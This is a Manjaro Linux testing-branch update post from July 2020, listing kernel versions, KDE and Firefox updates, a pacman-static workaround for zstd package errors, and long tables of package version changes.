<p></p><div class="lightbox-wrapper"><a class="lightbox" href="https://pbs.twimg.com/media/Ec3tgCrWkAITqEr?format=png&amp;name=large" title=""><img src="https://pbs.twimg.com/media/Ec3tgCrWkAITqEr?format=png&amp;name=large" alt="" width="690" height="388"><div class="meta"><svg class="fa d-icon d-icon-far-image svg-icon" aria-hidden="true"><use xlink:href="#far-image"></use></svg><span class="filename"></span><span class="informations">1920×1080</span><svg class="fa d-icon d-icon-discourse-expand svg-icon" aria-hidden="true"><use xlink:href="#discourse-expand"></use></svg></div></a></div><br><em>Our 11,6" laptop is back! Now with <strong>better hardware</strong>. Find out <a href="https://starlabs.systems/pages/lite-mk-iii?rfsn=3932868.5e88d65#">more</a>!  <span class="hashtag">#stayhome</span>, <span class="hashtag">#staysafe</span>, <span class="hashtag">#stayhealthy</span></em>
<ul><li>We updated some of our <strong>KDE-git</strong> packages</li>
<li>
<strong>KDE Frameworks</strong> <a href="https://kde.org/announcements/kde-frameworks-5.72.0">5.72.0</a> brings needed patches we partly already backported before</li>
<li>
<strong>Firefox</strong> got another beta release</li>
<li>For <strong>Linux57</strong> kernel series we added the <a href="https://aur.archlinux.org/cgit/aur.git/plain/futex-wait-multiple-5.2.1.patch?h=linux-fsync">FSync</a> by <strong>Valve</strong> to speed up some processes, especially for Proton gaming. Tell us if we also should backport it to <strong>Linux54</strong> series.</li>
<li>The <strong>Linux Kernel</strong> is now at <a href="https://lore.kernel.org/lkml/CAHk-=wgX5+Q_trdMPaaQZmko0Og_eqAYoyMa_8S3ie+1Us6rkw@mail.gmail.com/">5.8-rc5</a>, which is one of the largest releases yet to come.</li>
<li>The usual upstream updates rebuilds/updates including <strong>python</strong> and <strong>haskell</strong> by Arch</li>
</ul><p>If you like following latest Plasma development you may also like to check out our current version of <a href="https://osdn.net/projects/manjaro-community/storage/kde-dev/20.1/">manjaro-kde-dev</a>, which we build on a regular basis against kde-git master packages. Also check out our latest preview of <strong>Manjaro Mikah 20.1</strong>! <a href="https://osdn.net/projects/manjaro/storage/xfce/20.1-pre3/">XFCE</a>, <a href="https://osdn.net/projects/manjaro/storage/kde/20.1-pre3/">KDE</a> and <a href="https://osdn.net/projects/manjaro/storage/gnome/20.1-pre3/">Gnome</a></p>
<hr><h3>Upstream notice</h3>
<p><strong>Arch</strong> updated their default compression to <a href="https://lists.archlinux.org/pipermail/arch-dev-public/2019-December/029752.html">zstd</a>. We adopted to the same standard. More and more packages will have the <code>zst</code> extension from now on. If you get for what ever reason an error with ZSTD not supported as archive format you can do this:</p>
<pre><code class="lang-auto">sudo pacman -Syy
sudo pacman -S pacman-static
sudo pacman-static -Syyu
</code></pre>
<hr><p><strong>Our current supported kernels</strong></p>
<ul><li>linux44 4.4.230</li>
<li>linux49 4.9.230</li>
<li>linux414 4.14.188</li>
<li>linux419 4.19.132</li>
<li>linux54 5.4.51</li>
<li>linux56 5.6.19 [EOL]</li>
<li>linux57 5.7.8</li>
<li>linux58 5.8-rc5</li>
<li>linux54-rt 5.4.44_rt27</li>
<li>linux56-rt 5.6.17_rt9</li>
</ul><p><strong>Package Changes</strong> (Tue Jul 14 09:18:00 CEST 2020)</p>
<ul><li>testing community x86_64:  323 new and 336 removed package(s)</li>
<li>testing core x86_64:  7 new and 7 removed package(s)</li>
<li>testing extra x86_64:  144 new and 147 removed package(s)</li>
<li>testing multilib x86_64:  1 new and 1 removed package(s)</li>
</ul><pre><code class="lang-auto">:: Different overlay package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-07-11           2020-07-14
-------------------------------------------------------------------------------
                          attica-git5.72.0.r756.g89fa49d-15.73.0.r758.gef33d1e-1
                        bluez-qt-git5.72.0.r598.g8acfb1e-15.73.0.r600.g61e7602-1
                          breeze-git5.19.80.r2009.g0fefe7fb-15.19.80.r2010.gba646dab-1
                    breeze-icons-git5.72.0.r1590.g860440c9-15.73.0.r1596.g6da48a55-1
                               cpu-x  4.0.1.r6.gc8c7c09-1 4.0.1.r16.g0fdcbb0-1
                         edid-decode       r439.4d94efe-1       r450.4ee445e-1
             extra-cmake-modules-git5.72.0.r3174.gac7404e-15.73.0.r3175.g6a278df-1
            frameworkintegration-git5.72.0.r527.gd183aa8-15.73.0.r528.gfe2f686-1
                             gtkhash                1.3-1                1.4-2
                        gtkhash-caja                1.3-1                1.4-2
                    gtkhash-nautilus                1.3-1                1.4-2
                        gtkhash-nemo                1.3-1                1.4-2
                      gtkhash-thunar                1.3-1                1.4-2
                     kactivities-git5.72.0.r1293.gb5184fc9-15.73.0.r1295.g15eb4873-1
               kactivities-stats-git5.72.0.r286.g573cc98-15.73.0.r288.ge462ee0-1
               kactivitymanagerd-git5.15.80.r1293.g1b68915-15.15.80.r1294.gb5a7049-1
                         kapidox-git5.72.0.r480.gcce22b2-15.73.0.r481.gb3dff93-1
                        karchive-git5.72.0.r425.gf83a898-15.73.0.r427.g8175fde-1
                           kauth-git5.72.0.r366.g8056e62-15.73.0.r368.g4960beb-1
                      kbookmarks-git5.72.0.r341.g3c71df9-15.73.0.r343.g5b1a965-1
                        kcmutils-git5.72.0.r411.g913e339-15.73.0.r412.g8146073-1
                         kcodecs-git5.72.0.r315.gfa1cf9e-15.73.0.r317.g3c83f81-1
                     kcompletion-git5.72.0.r372.gfce45a1-15.73.0.r373.g12c9edf-1
                         kconfig-git5.72.0.r703.g5d73eed-15.73.0.r706.g538cf78-1
                  kconfigwidgets-git5.72.0.r477.g06df628-15.73.0.r480.gdaaf5e9-1
                     kcoreaddons-git5.72.0.r998.g13c61ae-15.73.0.r1001.g756557b-1
                          kcrash-git5.72.0.r321.g4e699aa-15.73.0.r323.g45e8369-1
                     kdbusaddons-git5.72.0.r313.g1ac4c22-15.73.0.r315.gde2efca-1
                    kdeclarative-git5.72.0.r785.gf3c8973-15.73.0.r787.g774f53e-1
                            kded-git5.72.0.r324.g5275ad0-15.73.0.r326.g5c224aa-1
                 kdelibs4support-git5.72.0.r946.ge0d46273-15.73.0.r947.g85ac93b7-1
                kdeplasma-addons-git5.19.80.r8360.gbc0aa0ade-15.19.80.r8361.g350a27762-1
                 kdesignerplugin-git5.72.0.r285.g9aab163-15.73.0.r286.gfe4b232-1
                           kdesu-git5.72.0.r402.gad94aeb-15.73.0.r403.g554a354-1
                       kdewebkit-git5.72.0.r233.g0762500-15.73.0.r234.g5decc5f-1
                          kdnssd-git5.72.0.r261.g5e6968e-15.73.0.r262.g6918ff0-1
                       kdoctools-git5.72.0.r546.gf40c34d-15.73.0.r548.g8265a67-1
                      kemoticons-git5.72.0.r327.gac044e6-15.73.0.r329.g216be62-1
                   kfilemetadata-git5.72.0.r705.g39f4389-15.73.0.r707.g82ec4b7-1
                    kglobalaccel-git5.72.0.r369.g28ca234-15.73.0.r371.gbb0a52b-1
                      kguiaddons-git5.72.0.r281.g47906ed-15.73.0.r282.g5f16a4b-1
                       kholidays-git5.72.0.r872.g126334b-15.73.0.r873.g9ef71b4-1
                           khtml-git5.72.0.r502.g39ba012-15.73.0.r504.g1c6e8bc-1
                           ki18n-git5.72.0.r402.ge6ea7e3-15.73.0.r404.g1bc742e-1
                     kiconthemes-git5.72.0.r432.g07e7c54-15.73.0.r434.ga4f1533-1
                       kidletime-git5.72.0.r252.g6309093-15.73.0.r254.g8debece-1
                   kimageformats-git5.57.0.r276.gd1136c4-15.57.0.r278.g20f996a-1
                           kinit-git5.72.0.r349.g947acba-15.73.0.r351.gcf85d60-1
                             kio-git5.72.0.r4095.gb745168f-15.73.0.r4099.g9cb68b53-1
                       kirigami2-git5.72.0.r2260.g147c40a5-15.73.0.r2262.ga3354c3d-1
                     kitemmodels-git5.72.0.r436.g075f437-15.73.0.r438.g6ebb773-1
                      kitemviews-git5.72.0.r274.g15309dd-15.73.0.r275.gb3d37b4-1
                     kjobwidgets-git5.72.0.r304.g482646a-15.73.0.r306.gec57c4a-1
                             kjs-git5.72.0.r289.g766b82a-15.73.0.r290.ga619916-1
                        kjsembed-git5.72.0.r249.g8e50ad8-15.73.0.r250.g08a64c6-1
                    kmediaplayer-git5.72.0.r243.g712dbc7-15.73.0.r244.g5edbafe-1
                       knewstuff-git5.72.0.r851.g75a3ca48-15.73.0.r853.g3a4de0ca-1
                  knotifications-git5.72.0.r550.g84f1e1e-15.73.0.r552.g848b54d-1
                   knotifyconfig-git5.72.0.r291.g7461994-15.73.0.r292.gd7898ea-1
                        kpackage-git5.72.0.r587.g19df37c-15.73.0.r589.g705ad04-1
                          kparts-git5.72.0.r421.g720e594-15.73.0.r422.g04d319a-1
                         kpeople-git5.72.0.r1259.g8bcf4e8-15.73.0.r1261.g274e0e8-1
                       kplotting-git5.72.0.r238.g3fb5eeb-15.73.0.r239.g600b968-1
                            kpty-git5.72.0.r266.g50defbf-15.73.0.r267.g1386d87-1
                           kross-git5.72.0.r283.g224edb3-15.73.0.r285.gd030d76-1
                         krunner-git5.72.0.r449.gae5f456-15.73.0.r452.g3b6d4be-1
                        kservice-git5.72.0.r784.g85d0930-15.73.0.r786.g04af66b-1
                     ktexteditor-git5.72.0.r2381.g0e26eb33-15.73.0.r2385.ge8b8c363-1
                    ktextwidgets-git5.72.0.r330.g4841915-15.73.0.r331.gb5c1a48-1
                 kunitconversion-git5.72.0.r313.ga1bd736-15.73.0.r314.gae82459-1
                         kwallet-git5.72.0.r976.gfc36db0-15.73.0.r978.gaf8e73b-1
                        kwayland-git5.72.0.r1014.g9ab3265-15.73.0.r1016.gfb63879-1
                 kwayland-server-git5.19.80.r1068.g82277db-15.19.80.r1069.g1c4a22b-1
                  kwidgetsaddons-git5.72.0.r694.g4336532-15.73.0.r699.gc5d6ea9-1
                   kwindowsystem-git5.72.0.r521.gf9f12e6-15.73.0.r523.g97468c9-1
                         kxmlgui-git5.72.0.r635.g06a9132-15.73.0.r638.g2bbb468-1
                   kxmlrpcclient-git5.72.0.r401.g1b7d63ccc-15.73.0.r403.g9409ae954-1
                 manjaro-i3-settings           20191111-1           20200713-2
                           milou-git5.19.80.r692.gf5fb834-15.19.80.r693.g7efea66-1
                 modemmanager-qt-git5.72.0.r461.gd5d1dad-15.73.0.r463.gb414209-1
               networkmanager-qt-git5.72.0.r1055.g3fd7635-15.73.0.r1057.g6842819-1
                    oxygen-icons-git5.72.0.r232.g4b25289-15.73.0.r233.g1a696f3-1
                oxygen-icons-svg-git5.72.0.r232.g4b25289-15.73.0.r233.g1a696f3-1
                plasma-framework-git5.72.0.r15479.g12dd2589f-15.73.0.r15487.gcc8675913-1
                    plasma-vault-git5.19.80.r289.ga31cf36-15.19.80.r290.gc4932f9-1
          plasma-wayland-session-git5.19.80.r9190.gd752a3ed7-15.19.80.r9191.gd68c16b27-1
                plasma-workspace-git5.19.80.r9190.gd752a3ed7-15.19.80.r9191.gd68c16b27-1
                          prison-git5.72.0.r262.ga69837d-15.73.0.r264.g9449762-1
              qqc2-desktop-style-git5.72.0.r373.g16c057c-15.73.0.r374.ge7f2fcd-1
                           solid-git5.72.0.r577.g04992d1-15.73.0.r579.g8e0957c-1
                          sonnet-git5.72.0.r539.g630450e-15.73.0.r541.g8e4b252-1
                     syndication-git5.72.0.r772.gc9800b1-15.73.0.r774.ga2e5875-1
             syntax-highlighting-git5.72.0.r1130.g2b65a6f-15.73.0.r1132.g7a0521f-1
                    threadweaver-git5.72.0.r447.ge4f07c5-15.73.0.r448.gc12168d-1
                    cinnamon-desktop                    -              4.6.3-1
                       gtkhash-peony                    -                1.4-2


:: Different sync package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-07-11           2020-07-14
-------------------------------------------------------------------------------
                  appmenu-gtk-module              0.7.3-2            0.7.3.1-1
                       atomicparsley              0.9.6-120200701.154658.b0d6223-1
                    autoconf-archive       1:2019.01.06-1       1:2019.01.06-2
                               broot             0.18.3-1             0.18.6-1
                    cinnamon-desktop              4.6.2-1              4.6.3-1
                           cmark-gfm       0.29.0.gfm.0-1       0.29.0.gfm.0-2
                        cozy-desktop             3.20.0-2             3.21.0-1
                          cozy-stack           1:1.4.12-2           1:1.4.14-1
                                crun               0.14-1             0.14.1-1
                             dbeaver              7.1.1-1              7.1.2-1
                          dhall-bash            1.0.31-14            1.0.31-15
                            electrum              3.3.8-2              4.0.2-1
                          fanficfare             3.20.1-1             3.21.0-1
           firefox-developer-edition             79.0b6-1             79.0b7-1
  firefox-developer-edition-i18n-ach             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-af             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-an             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-ar             79.0b6-1             79.0b7-1
  firefox-developer-edition-i18n-ast             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-az             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-be             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-bg             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-bn             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-br             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-bs             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-ca             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-ca-valencia       79.0b6-1             79.0b7-1
  firefox-developer-edition-i18n-cak             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-cs             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-cy             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-da             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-de             79.0b6-1             79.0b7-1
  firefox-developer-edition-i18n-dsb             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-el             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-en-ca             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-en-gb             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-en-us             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-eo             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-es-ar             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-es-cl             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-es-es             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-es-mx             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-et             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-eu             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-fa             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-ff             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-fi             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-fr             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-fy-nl             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-ga-ie             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-gd             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-gl             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-gn             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-gu-in             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-he             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-hi-in             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-hr             79.0b6-1             79.0b7-1
  firefox-developer-edition-i18n-hsb             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-hu             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-hy-am             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-ia             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-id             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-is             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-it             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-ja             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-ka             79.0b6-1             79.0b7-1
  firefox-developer-edition-i18n-kab             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-kk             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-km             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-kn             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-ko             79.0b6-1             79.0b7-1
  firefox-developer-edition-i18n-lij             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-lt             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-lv             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-mk             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-mr             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-ms             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-my             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-nb-no             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-ne-np             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-nl             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-nn-no             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-oc             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-pa-in             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-pl             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-pt-br             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-pt-pt             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-rm             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-ro             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-ru             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-si             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-sk             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-sl             79.0b6-1             79.0b7-1
  firefox-developer-edition-i18n-son             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-sq             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-sr             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-sv-se             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-ta             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-te             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-th             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-tl             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-tr             79.0b6-1             79.0b7-1
  firefox-developer-edition-i18n-trs             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-uk             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-ur             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-uz             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-vi             79.0b6-1             79.0b7-1
   firefox-developer-edition-i18n-xh             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-zh-cn             79.0b6-1             79.0b7-1
firefox-developer-edition-i18n-zh-tw             79.0b6-1             79.0b7-1
              firefox-tree-style-tab              3.5.9-1             3.5.12-1
               firefox-ublock-origin             1.28.0-1             1.28.2-1
                             foliate              2.4.0-2              2.4.2-1
               freepats-general-midi           20200703-1           20200711-1
                             fusesoc               1.10-1             1.11.0-2
                            geogebra          6.0.592.0-1          6.0.593.0-1
                           git-annex        8.20200617-16        8.20200617-17
                         go-ethereum             1.9.15-1             1.9.16-1
                              gopass              1.9.2-2              1.9.2-3
                            gpsbabel              1.7.0-1              1.7.0-2
                           gscan2pdf              2.8.0-1              2.8.1-1
               haskell-binary-parser              0.5.6-6              0.5.6-7
   haskell-bytestring-strict-builder           0.4.5.3-77           0.4.5.3-78
              haskell-deferred-folds          0.9.10.1-86          0.9.10.1-87
                       haskell-hasql              1.4.4-7              1.4.4-8
                  haskell-hasql-pool             0.5.2-21             0.5.2-22
           haskell-hasql-transaction           1.0.0.1-40           1.0.0.1-41
          haskell-neat-interpolation             0.5.1-24             0.5.1-25
           haskell-postgresql-binary             0.12.3-6             0.12.3-7
                      haskell-rebase             1.6.1-17             1.6.1-18
                    haskell-rerebase             1.6.1-17             1.6.1-18
                   haskell-selective              0.4.1-8            0.4.1.1-1
                haskell-text-builder           0.6.6.1-47           0.6.6.1-48
                haskell-yesod-static          1.6.0.1-412            1.6.1.0-1
                         hledger-web            1.18.1-10            1.18.1-11
                            influxdb              1.8.0-1              1.8.1-1
                         libgcrypt15              1.5.6-3              1.5.6-4
                            libslirp              4.3.0-1              4.3.1-1
                           miniupnpc       2.1.20190408-2       2.1.20190408-3
                              mopidy              3.0.2-1              3.0.2-2
                                mypy              0.782-1              0.782-2
                     mysql-workbench             8.0.20-3             8.0.21-1
               netfilter-fullconenat       r73.0cf3b48-30       r73.0cf3b48-31
                      nginx-mainline             1.19.0-1             1.19.1-1
                    nginx-mod-brotli            1:0.1.2-7          1:1.0.0rc-1
                              podman              2.0.1-1              2.0.2-1
                       podman-docker              2.0.1-1              2.0.2-1
                           postgrest             7.0.1-35             7.0.1-36
                python-aiohttp-socks              0.3.9-1              0.4.2-1
                         python-atom              0.4.3-1              0.5.2-1
                     python-autobahn             20.6.2-1             20.6.2-2
                      python-cheroot              8.3.0-1              8.3.1-1
                        python-crc16              0.1.1-2              0.1.1-3
                     python-cssutils              1.0.2-4              1.0.2-5
          python-django-crispy-forms              1.9.1-1              1.9.2-1
                   python-flufl.i18n              2.0.2-2                3.0-1
                       python-future             0.18.2-2             0.18.2-3
                        python-httpx             0.13.3-4             0.13.3-5
                   python-hypothesis             5.19.0-1             5.19.2-1
                     python-identify             1.4.22-1             1.4.23-1
                        python-kazoo              2.7.0-1              2.8.0-1
              python-language-server             0.34.1-1             0.34.1-2
                      python-mutagen             1.44.0-1             1.45.0-1
              python-openstackclient              5.3.0-1              5.3.0-2
                       python-pg8000             1.15.3-1             1.16.0-1
                       python-pipenv           2020.6.2-1           2020.6.2-2
                     python-pwntools              4.1.1-1              4.2.1-1
                  python-pycontracts             1.8.14-1             1.8.14-2
                     python-pydantic              1.5.1-1                1.6-1
                    python-pyenchant              2.0.0-5              3.1.1-2
                     python-pylibacl              0.5.4-2              0.5.4-3
               python-spyder-kernels              0.5.2-4              1.9.1-1
         python-sqlalchemy-continuum              1.3.9-1              1.3.9-2
             python-sqlalchemy-utils             0.35.0-1             0.35.0-2
                    python-stevedore              3.0.0-1              3.1.0-1
                      python-tornado              6.0.4-1              6.0.4-2
              python-unittest-mixins                1.6-3                1.6-4
                        python-wheel             0.34.2-2             0.34.2-3
                     python2-cheroot              8.3.0-1              8.3.1-1
                      python2-future             0.18.2-2                    -
                 python2-pycontracts             1.8.14-1                    -
                   python2-pyenchant              2.0.0-5                    -
                    python2-pylibacl              0.5.4-2                    -
                      python2-typing            3.7.4.1-1            3.7.4.2-1
             python2-unittest-mixins                1.6-3                    -
                       python2-wheel             0.34.2-2             0.34.2-3
                              rclone             1.52.2-1             1.52.2-2
                        riot-desktop              1.6.4-1              1.6.8-1
                            riot-web              1.6.4-1              1.6.8-1
                          rubberband              1.8.2-3              1.8.2-4
                       rust-analyzer           20200706-1           20200713-1
                           shorewall              5.2.6-1            5.2.6.1-1
                      shorewall-core              5.2.6-1            5.2.6.1-1
                          shorewall6              5.2.6-1            5.2.6.1-1
                             shotcut           20.06.28-1           20.07.11-1
                            skanlite            2.1.0.1-2              2.2.0-1
                         slirp4netns              1.1.2-1              1.1.3-1
                              spring              104.0-8              104.0-9
                              spyder              3.3.6-3              4.1.3-2
                            sshuttle              1.0.2-1              1.0.3-1
                               stack             2.3.1-57             2.3.1-58
                          strawberry             0.6.12-2             0.6.13-1
                          streamlink              1.4.1-1              1.5.0-1
                        systemd-swap              4.2.3-2              4.3.0-1
                      tamarin-prover            1.4.1-377            1.4.1-378
                         uboot-tools            2020.04-1            2020.07-1
                             udiskie              2.2.0-1              2.2.0-2
                 ukui-control-center              2.0.4-1              2.0.5-1
                               uwsgi           2.0.19.1-2           2.0.19.1-3
                    uwsgi-plugin-cgi           2.0.19.1-2           2.0.19.1-3
                    uwsgi-plugin-jvm           2.0.19.1-2           2.0.19.1-3
                  uwsgi-plugin-lua51           2.0.19.1-2           2.0.19.1-3
                   uwsgi-plugin-mono           2.0.19.1-2           2.0.19.1-3
               uwsgi-plugin-notfound           2.0.19.1-2           2.0.19.1-3
                    uwsgi-plugin-php           2.0.19.1-2           2.0.19.1-3
                   uwsgi-plugin-psgi           2.0.19.1-2           2.0.19.1-3
                   uwsgi-plugin-pypy           2.0.19.1-2           2.0.19.1-3
                 uwsgi-plugin-python           2.0.19.1-2           2.0.19.1-3
                uwsgi-plugin-python2           2.0.19.1-2                    -
                   uwsgi-plugin-rack           2.0.19.1-2           2.0.19.1-3
                 uwsgi-plugin-webdav           2.0.19.1-2           2.0.19.1-3
                 uwsgi-plugin-zabbix           2.0.19.1-2           2.0.19.1-3
         v2ray-domain-list-community     20200711063108-1     20200713094236-1
                          vdirsyncer             0.16.8-2             0.16.8-3
                               vigra            1.11.1-24            1.11.1-25
                           vigra-doc            1.11.1-24            1.11.1-25
                               vim-a              2.18-10                    -
                         vim-ansible                2.1-2                2.2-1
                vim-colorsamplerpack         2012.10.28-6                    -
                  vim-doxygentoolkit             0.2.13-5                    -
                  vim-guicolorscheme                1.2-6                    -
                     vim-minibufexpl              6.5.2-3                    -
                 vim-omnicppcomplete             0.4.1-10                    -
                         vim-project             1.4.1-10                    -
                         vim-taglist                 46-5                    -
                       vim-ultisnips                3.2-2                3.2-3
                      vim-vcscommand            1.99.47-4                    -
                       vim-workspace             1.0b1-10                    -
                       wireshark-cli              3.2.4-1              3.2.5-1
                        wireshark-qt              3.2.4-1              3.2.5-1
                     xcb-util-errors                1.0-3                1.0-4
                          youtube-dl       2020.06.16.1-1       2020.06.16.1-2
                      openfpgaloader                    -                0.1-1
                    python-bitstring                    -              3.1.7-1


:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-07-11           2020-07-14
-------------------------------------------------------------------------------
                   amd-ucode 20200702.r1665.74ac3b5-1 20200713.r1672.3d3a06f-1
              linux-firmware 20200702.r1665.74ac3b5-1 20200713.r1672.3d3a06f-1
                             linux57              5.7.8-5              5.7.8-6
                     linux57-headers              5.7.8-5              5.7.8-6
                       linux58 5.8rc4.d0708.g0bddd22-1 5.8rc5.d0712.g11ba468-1
               linux58-headers 5.8rc4.d0708.g0bddd22-1 5.8rc5.d0712.g11ba468-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-07-11           2020-07-14
-------------------------------------------------------------------------------
                              dhcpcd              9.1.2-2              9.1.4-1


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-07-11           2020-07-14
-------------------------------------------------------------------------------
                           calamares           3.2.26.1-1             3.2.27-1
             calamares-git 3.2.26.1.r8123.a8230a641-1 3.2.28.r8158.3fd088b33-1
              grub-theme-live-common               18.1-1               20.1-1
             grub-theme-live-manjaro               18.1-1               20.1-1
                  grub-theme-manjaro               18.1-1               20.1-1
                                gvim           8.2.1168-0           8.2.1185-0
                   linux57-acpi_call             1.1.0-13             1.1.0-14
                    linux57-bbswitch               0.8-13               0.8-14
                 linux57-broadcom-wl      6.30.223.271-13      6.30.223.271-14
                 linux57-ndiswrapper              1.63-13              1.63-14
                linux57-nvidia-340xx           340.108-13           340.108-14
                linux57-nvidia-390xx           390.132-13           390.132-14
                linux57-nvidia-418xx           418.113-13           418.113-14
                linux57-nvidia-430xx            430.64-13            430.64-14
                linux57-nvidia-435xx            435.21-13            435.21-14
                linux57-nvidia-440xx            440.100-4            440.100-5
                       linux57-r8168          8.048.03-13          8.048.03-14
                   linux57-rtl8723bu          20200405-13          20200405-14
                    linux57-tp_smapi              0.43-13              0.43-14
                 linux57-vhba-module          20200106-13          20200106-14
    linux57-virtualbox-guest-modules             6.1.10-9            6.1.10-10
     linux57-virtualbox-host-modules             6.1.10-9            6.1.10-10
                         linux57-zfs             0.8.4-13             0.8.4-14
                   linux58-acpi_call            1.1.0-0.4            1.1.0-0.5
                    linux58-bbswitch              0.8-0.4              0.8-0.5
                 linux58-broadcom-wl     6.30.223.271-0.4     6.30.223.271-0.5
                linux58-nvidia-390xx          390.132-0.4          390.132-0.5
                linux58-nvidia-418xx          418.113-0.4          418.113-0.5
                linux58-nvidia-430xx           430.64-0.4           430.64-0.5
                linux58-nvidia-435xx           435.21-0.4           435.21-0.5
                linux58-nvidia-440xx          440.100-0.4          440.100-0.5
                       linux58-r8168         8.048.03-0.4         8.048.03-0.5
                    linux58-tp_smapi             0.43-0.4             0.43-0.5
                 linux58-vhba-module         20200106-0.4         20200106-0.5
                    plasma-framework           5.71.0-2.1                    -
                                 vim           8.2.1168-0           8.2.1185-0
                         vim-runtime           8.2.1168-0           8.2.1185-0


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-07-11           2020-07-14
-------------------------------------------------------------------------------
                      akonadi-search            20.04.3-1            20.04.3-2
                        alertmanager             0.21.0-1             0.21.0-2
                              attica             5.71.0-1             5.72.0-1
                               baloo             5.71.0-1             5.72.0-1
                            bluez-qt             5.71.0-1             5.72.0-1
                        breeze-icons             5.71.0-1             5.72.0-1
                          claws-mail             3.17.5-3             3.17.6-1
                               clisp            2.49.93-3            2.49.93-4
                 extra-cmake-modules             5.71.0-1             5.72.0-1
                          fluidsynth              2.1.3-1              2.1.4-1
                frameworkintegration             5.71.0-1             5.72.0-1
                                 gdm             3.36.2-1             3.36.3-1
                               icewm              1.6.6-1              1.7.0-1
                         kactivities             5.71.0-1             5.72.0-1
                   kactivities-stats             5.71.0-1             5.72.0-1
                             kapidox             5.71.0-1             5.72.0-1
                            karchive             5.71.0-1             5.72.0-1
                               kauth             5.71.0-1             5.72.0-1
                          kbookmarks             5.71.0-1             5.72.0-1
